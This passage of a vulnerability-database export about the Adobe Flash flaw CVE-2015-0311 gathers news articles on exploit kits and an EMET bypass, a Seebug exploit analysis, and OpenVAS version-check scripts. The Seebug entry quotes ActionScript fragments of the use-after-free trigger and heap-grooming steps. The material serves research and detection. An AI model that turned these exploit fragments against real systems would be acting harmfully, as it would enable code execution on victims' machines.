said.\n\n\u201cEncrypting all these games demonstrates the evolution of crypto-ransomware as cybercriminals target new niches. Many young adults may not have any crucial documents or source code on their machine (even photographs are usually stored at Tumblr or Facebook), but surely most of them have a Steam account with a few games and an iTunes account full of music,\u201d Kotov wrote. \u201cNon gamers are also likely to be frustrated by these attacks if they lose their personal data.\u201d\n\nSome of the files the variant goes after are often impossible to restore; those include user profile data, saved games, in-game maps and mods, Kotov wrote.\n\nThe Bromium advisory goes into more detail about command and control communication and encryption mechanisms. 
The experts advise gamers to back up their files on an external hard drive that is not connected to the Internet.\n\n\u201cAs more file categories are infected, a broader audience is affected,\u201d Kotov said. \u201cThe attackers are also getting better at incorporating BitCoin code directly into their projects, which isn\u2019t a good sign.\u201d\n", "modified": "2015-04-13T17:19:09", "published": "2015-03-12T15:57:56", "id": "THREATPOST:531D9E2E2960D83A1A334DF82AE3EA2E", "href": "https://threatpost.com/cryptolocker-variant-coming-after-gamers/111611/", "type": "threatpost", "title": "CryptoLocker Variant Coming After Gamers", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:06", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311", "CVE-2017-11882"], "description": "Backwards compatibility, a necessary evil for Microsoft in its need to support so many legacy applications on Windows, may be its undoing as researchers have found a way to exploit this layer in the operating system to bypass existing mitigations against memory-based exploits.\n\nSpecifically in this case, researchers at Duo Security have slid past Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, a suite of more than a dozen freely available mitigations against memory attacks that include ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and return-oriented programming mitigations.\n\nThe soft spot, the researchers said, is the Windows on Windows, or WoW64, Windows subsystem that allows 32-bit software to run on 64-bit Windows machines. A sizeable sample of Duo customers shows some disturbing numbers in terms of vulnerable users. 
For example, 80 percent of browsers in the researchers\u2019 sample size were 32-bit processes executing on a 64-bit host running WOW64, putting them all at risk.\n\nEMET remains a viable protection for Windows users, one that Microsoft has marketed many times as a temporary stopgap between the disclosure of a zero-day vulnerability and the availability of a patch. But in the WoW64 example, EMET can be completely bypassed.\n\n\u201cIt\u2019s a classic, recurring problem that we see a lot in Windows where there\u2019s a lot of legacy stuff to support, so you build a feature to facilitate that transition to run older software,\u201d said Darren Kemp, security researcher at Duo Security. \u201cBut the side effect is that as the OSes are improving, yes you\u2019re getting more and more security features, but they all maintain this specific compatibility layer and it\u2019s in a path that created some interesting bypass scenarios for various security features like DEP and ASLR. We\u2019re demonstrating that, but with an entirely different mechanism.\u201d\n\nDuo said it reached out to Microsoft with its research and exploit, which was acknowledged. The issue, however, would likely require significant re-architecting of Windows with regard to the support of 32-bit applications on 64-bit systems, which is unlikely.\n\n\u201cThe subsystem results in some limitations, by design. And those limitations have a negative impact on security software,\u201d Kemp said. \u201cIt\u2019s simply a limitation of Windows. It\u2019s not an inherent vulnerability, but it essentially makes the mitigation ineffective in essentially all cases of 32-bit software running on 64-bit version of Windows.\u201d\n\nKemp and his colleague and senior security researcher Mikhail Davidov modified an existing exploit for a patched Adobe Flash use-after-free vulnerability (CVE-2015-0311) to get past EMET. 
They explain in a [paper](<https://www.duosecurity.com/blog/wow64-and-so-can-you>) released today that 32-bit applications under WoW64 behave unlike they do in 32-bit systems; the processor\u2019s ability to switch between execution modes at runtime opens up a number of exploit options for attackers.\n\nFrom the paper:\n\n> \u201cOne of the most important limitations imposed by the WoW64 subsystem is that it makes it very difficult for security software to effectively hook low-level functionality from userland. Windows does not provide any \u2018official\u2019 mechanism for inserting 64-bit modules into 32-bit processes. A significant portion of the API functionality a piece of security software (i.e. EMET) would want to monitor is implemented in the 64-bit copy of ntdll.dll (process creation, module loading, etc.).\u201d\n\nThey explain that an attacker would need to transition the processor to long mode, resolve the location of 64-bit modules and functions within them and overcome the limitations of available 64-bit APIs in order to avoid the function hooks used by security software. EMET hooks into ntdll.dll, a library that provides low-level functionality that applications use. Two copies of the library exist, one on each side of this process, 32-bit and 64-bit; however, the researchers explain that on the 64-bit side none of the hooks are in place.\n\n\u201cAll of those mitigations don\u2019t exist there,\u201d Kemp said. \u201cWe force the transition and then when everything executes, none of those hooks are present.\u201d\n\n[EMET bypasses](<https://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437/>) are not new. In the last 18 months, there have been a number of high-profile exploits, most of them from the white-hat realm, that have illuminated some shortcomings in the valuable [Windows security feature](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>). 
Black hats too have taken an interest in EMET; the Operation Snowman APT campaign, for example, contained a module that ran a check to [determine whether EMET was running on the compromised host](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>) and then made a decision as to whether to execute the remainder of the attack.\n\n\u201cBecause Microsoft is so focused on not breaking legacy technology\u2014and from an enterprise point of view, that\u2019s a good thing\u2014it enabled these kinds of attacks,\u201d Davidov said. \u201cEven though most people are running a 64-bit version of the OS these days, you end up with a ton of 32-bit applications on the machine, which means you end up with the WoW64 subsystem on there as well, which enables EMET to be bypassed.\u201d\n", "modified": "2015-11-06T14:03:07", "published": "2015-11-02T15:29:12", "id": "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "href": "https://threatpost.com/latest-emet-bypass-targets-wow64-windows-subsystem/115224/", "type": "threatpost", "title": "Latest EMET Bypass Targets WoW64 Windows Subsystem", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:30", "bulletinFamily": "info", "cvelist": ["CVE-2015-0310", "CVE-2015-0311"], "description": "**UPDATE**\u2013Adobe has released an emergency update for Flash to address a zero-day vulnerability that is being actively exploited. The company also is looking into reports of exploits for a separate Flash bug not fixed in the new release, which is being used in attacks by the Angler exploit kit.\n\nThe vulnerability that Adobe patched Thursday is under active attack, but Adobe officials said that this flaw is not the one that security researcher Kafeine said Wednesday was being used in the Angler attacks.\n\n\u201cAdobe has released security updates for Adobe Flash Player for Windows, Macintosh and Linux. 
These updates address a vulnerability that could be used to circumvent memory randomization mitigations on the Windows platform,\u201d Adobe said in its [advisory](<http://helpx.adobe.com/security/products/flash-player/apsb15-02.html>). \n\n\u201cAdobe is aware of reports that an exploit for CVE-2015-0310 exists in the wild, which is being used in attacks against older versions of Flash Player. Additionally, we are investigating reports that a separate exploit for Flash Player 16.0.0.287 and earlier also exists in the wild.\u201d\n\nThe patch for Flash comes just a day after Kafeine disclosed that some instances of the Angler exploit kit contained an exploit for a previously unknown vulnerability in the software. Adobe officials said Wednesday that they were investigating the reports. Kafeine initially saw Angler attacking the latest version of Flash in IE on Windows XP, Vista, 7 and 8, but said the exploit wasn\u2019t being used against Chrome or Firefox.\n\nOn Thursday he said on Twitter that the group behind Angler had changed the code to exploit Firefox as well as fully patched IE 11 on Windows 8.1. The Flash zero-day exploit is being used to install a version of the Bedep malware, which is used in ad fraud campaigns.\n\n\u201cOne last bad news : Windows 8.1 Internet Explorer 11 fully updated is now owned as well,\u201d Kafeine [said](<https://twitter.com/kafeine/status/558272193797566464>).\n\nAdobe late on Thursday said that it plans to release a patch for the second zero-day flaw in Flash\u2013the one being used by the Angler exploit kit\u2013next week, but did not specify an exact release date. The vulnerability affects the latest versions of Flash.\n\n\u201cA critical vulnerability (CVE-2015-0311) exists in Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh. 
Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,\u201d Adobe said in an advisory.\n\n\u201cWe are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8 and below.\u201d\n\nAngler is among the more dangerous exploit kits being used right now and the group behind the kit often has exploits for Flash vulnerabilities within days of a new Adobe patch being published. Adobe officials did not say whether there is an update in the works for the zero-day vulnerability.\n\n_This article was updated on Jan. 22 to include the information about the patch timing for the second Flash flaw._\n", "modified": "2015-01-23T16:53:56", "published": "2015-01-22T11:43:46", "id": "THREATPOST:FE4322E23327181E988F841DEFCCC3C6", "href": "https://threatpost.com/adobe-patches-one-zero-day-in-flash-still-investigating-separate-vulnerability/110586/", "type": "threatpost", "title": "Adobe Patches One Zero Day in Flash, Still Investigating Separate Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:26", "bulletinFamily": "info", "cvelist": ["CVE-2013-0311", "CVE-2015-0311", "CVE-2015-0313"], "description": "The little-known HanJuan exploit kit is delivering attacks targeting the most recent [Adobe Flash Player zero-day vulnerability](<http://threatpost.com/another-flash-zero-day-emerges/110786>). Adobe has yet to produce a patch for the flaw, which researchers at Trustwave said is a use-after-free vulnerability.\n\nThe flaw is the third to hit Flash in the last two weeks; the previous two have been patched by Adobe. 
A request to Adobe for comment on a patch for this bug was not returned in time for publication.\n\nAdobe confirmed the vulnerability on Monday affecting Flash version 16.0.0.296 and earlier for Windows. The exploitation technique used against this vulnerability, CVE-2015-0313, is similar to another zero-day exploit being served up in the Angler exploit kit, leading Trustwave to surmise it could be the same group behind both vulnerability discoveries and exploits. That [flaw was patched](<http://threatpost.com/adobe-begins-auto-update-patching-of-second-flash-player-zero-day/110640>) last week.\n\n\u201cThe vulnerability is a use-after-free vulnerability caused by a bug in how Flash handles the FlashCC (previously Flash Alchemy) \u2018fast memory access\u2019 feature (domainMemory), when the last is used by flash Workers (Flash threads),\u201d Trustwave said in its [report](<http://blog.spiderlabs.com/2015/02/a-new-zero-day-of-adobe-flash-cve-2015-0313-exploited-in-the-wild.html>) published yesterday.\n\nFrench researcher Kafeine, who found the Flash exploit in Angler, said there seems to be a strong connection between these exploits and the criminal gang behind Angler, which is also delivering Bedep click-fraud malware, and Reveton ransomware.\n\n\u201cWhy you don\u2019t hear that much about ([HanJuan](<http://www.malwaresigs.com/2013/10/14/unknown-ek/>)) is because the redirection chain has really strong filtering on the traffic to avoid most data centers (researchers using VPNs or virtual private servers to analyze malware and exploits),\u201d Kafeine told Threatpost.\n\nKafeine said the payload delivery is \u201cfileless\u201d and uses similar encryption (Xtea) as the Angler exploit; the exploit is dropping Bedep click-fraud malware, similar to CVE-2015-0311, he added.\n\nBoth this exploit and the CVE-2013-0311 exploit gain access to memory using a heap spray technique, Trustwave said. 
Trustwave said it was able to reproduce an exploit in its lab, and shared that process in its report.\n\nResearchers said the processes under attack support multi-threading in Flash, and the means by which data and objects are shared in memory. Within Flash, it is possible, Trustwave said, to access process memory using fast memory access, or ActionScript, which is achieved by setting memory data to a predefined ByteArray. Trustwave explained that if that ByteArray is freed by another thread, the domainMemory object will hold a pointer to freed memory.\n\n\u201cSuch a condition is a security risk and is usually classified as a use-after-free vulnerability. Using the reference to a freed memory area, it is possible to use/access the heap memory block directly,\u201d Trustwave said. \u201cThe exploit uses heap spraying to fill this freed memory with Vector Objects and corrupt the size of a given vector setting it to a very large size. This corrupted Vector will later be used to access the entire memory of the browser process and to gain code execution over the machine.\u201d\n\nAdobe on Monday posted an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-02.html>) on CVE-2015-0313, and said it was being [exploited in drive-by downloads and malvertising attacks](<http://threatpost.com/another-flash-zero-day-emerges/110786>). Some big sites were delivering malicious ads redirecting to the exploits, including DailyMotion, Wowhead, Answers.com, and Engage:BDR, among others. 
Adobe said attackers\u2019 exploits were targeting Windows 8.1 computers and below running Internet Explorer or Firefox.\n\nThis announcement came on the heels of two other warnings from Adobe regarding zero days in Flash. The more serious of the two was being delivered by the Angler Exploit Kit, and was discovered by Kafeine. That exploit used [multiple layers of obfuscation to hide the exploit](<http://threatpost.com/analysis-of-flash-zero-day-shows-layers-of-obfuscation/110674>) from detection.\n", "modified": "2015-04-13T17:21:31", "published": "2015-02-04T10:03:57", "id": "THREATPOST:598790503ACCB1E7323D4862D42346C2", "href": "https://threatpost.com/latest-flash-0day-under-attack-possible-ties-to-group-behind-angler-ek/110847/", "type": "threatpost", "title": "Third Adobe Flash 0Day Under Attack in HanJuan Exploit Kit", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:31:07", "description": "<p>This vulnerability has a root cause similar to the Flash ByteArray one: both are UAF command-execution bugs triggered through a call to the Clasz.valueOf() parameter.</p><p>Vulcan analyzed it immediately; the explanation below is based on that report (1):</p><pre class=\"lang-js\" data-lang=\"js\">// try to allocate two sequential pages of memory: [ matrix ][ MyClass2 ]\r\n\r\nfor(i=20; i < alen; i+=6){\r\n\r\na[i] = new Class2(i);\r\n\r\nfor(j=i+1; j < i+5; j++) \r\n\r\n a[j] = new ConvolutionFilter(14,15); // ConvolutionFilter is created here\r\n\r\na[i+5] = new Class2(i+5);\r\n\r\n}</pre><pre class=\"lang-js\" data-lang=\"js\">var m:Array = new Array(bLen);\r\n\r\nm[0] = new Clasz;\r\n\r\nm[1] = m[0];\r\n\r\n// set the matrix\r\ntry { filter.matrix = m; } catch (e:Error){}<br></pre><p>The key point here is that filter.matrix is assigned m (of type Array), the first element of Array m is a Clasz object, and the Clasz class defines a valueOf method; this valueOf is the key point at which the vulnerability is triggered:<br></p><p>3. In Clasz's valueOf function, set matrixX: </p><pre class=\"lang-js\" data-lang=\"js\">filter.matrixX = 15; // reallocate filter matrix; once this completes, a float array\r\n // (matrixArray) inside ConvolutionFilter is freed, but after valueOf() returns\r\n // the freed matrixArray is still used and data is written into it,\r\n // which causes the use after free.\r\n</pre><p>As can be seen in the valueOf function, after filter.matrixX is set, a series of Vector<uint> objects is allocated; these Vectors are used to occupy the memory of the freed matrixArray.</p><p>So when the program continues to write data into the freed matrixArray, it is actually writing into a Vector object, which is how the Vector's length field gets modified.</p><p>Reference links: </p><p>(1) <a href=\"http://blogs.360.cn/blog/hacking-team-part2/\" target=\"_blank\">Hacking Team Attack Code Analysis Part 2</a></p><p>(2) <a href=\"http://drops.wooyun.org/papers/5446\" target=\"_blank\">Exploiting CVE-2015-0311 (very detailed)</a> </p><p>(3) <a href=\"http://drops.wooyun.org/papers/5460\" target=\"_blank\">Exploiting CVE-2015-0311, Part II: Bypassing Control Flow Guard (very detailed)</a></p>", "published": "2015-07-08T00:00:00", "type": 
"seebug", "title": "Adobe Flash Player Convolution Filter UAF Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0311"], "modified": "2015-07-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89240", "id": "SSV:89240", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "openvas": [{"lastseen": "2020-01-31T18:37:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851013", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851013", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:0163-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851013\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 16:43:41 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0311\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:0163-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to version 11.2.202.440 (bsc#914463,\n APSA15-01, CVE-2015-0311).\n\n An update of flashplayer (executable binary) for i386 is currently not\n available and was thus disabled.\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0163-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.440~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.440~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.440~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310850973", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850973", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:0151-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but 
WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850973\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 15:19:15 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0311\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:0151-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to 11.2.202.440 (bsc#914463, APSA15-01,\n CVE-2015-0311).\n\n More information can be found at the linked vendor advisory.\n\n An update of flashplayer (executable binary) for i386 is currently not\n available. 
Disabled!\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0151-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.440~31.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.440~31.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:12:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "description": "This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.", "modified": "2019-07-17T00:00:00", "published": "2015-01-27T00:00:00", "id": "OPENVAS:1361412562310805261", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805261", "type": "openvas", "title": "Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Linux)", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805261\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-01-27 16:19:35 +0530 (Tue, 27 Jan 2015)\");\n script_name(\"Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on 
the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to some unspecified\n error and double-free flaw that is triggered as user-supplied input is not\n properly validated.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player through version\n 11.2.202.438 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.440 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62432\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n script_xref(name:\"URL\", value:\"http://www.rapid7.com/db/vulnerabilities/adobe-flash-apsb15-03-cve-2015-0312\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.440\"))\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: 11.2.202.440\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "description": "This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.", "modified": "2019-07-17T00:00:00", "published": "2015-01-27T00:00:00", "id": 
"OPENVAS:1361412562310805260", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805260", "type": "openvas", "title": "Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805260\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-01-27 16:16:40 +0530 (Tue, 27 Jan 2015)\");\n script_name(\"Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Mac OS X)\");\n\n 
script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to some unspecified\n error and double-free flaw that is triggered as user-supplied input is not\n properly validated.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 13.x through\n 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.264 or 16.0.0.296 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62432\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n 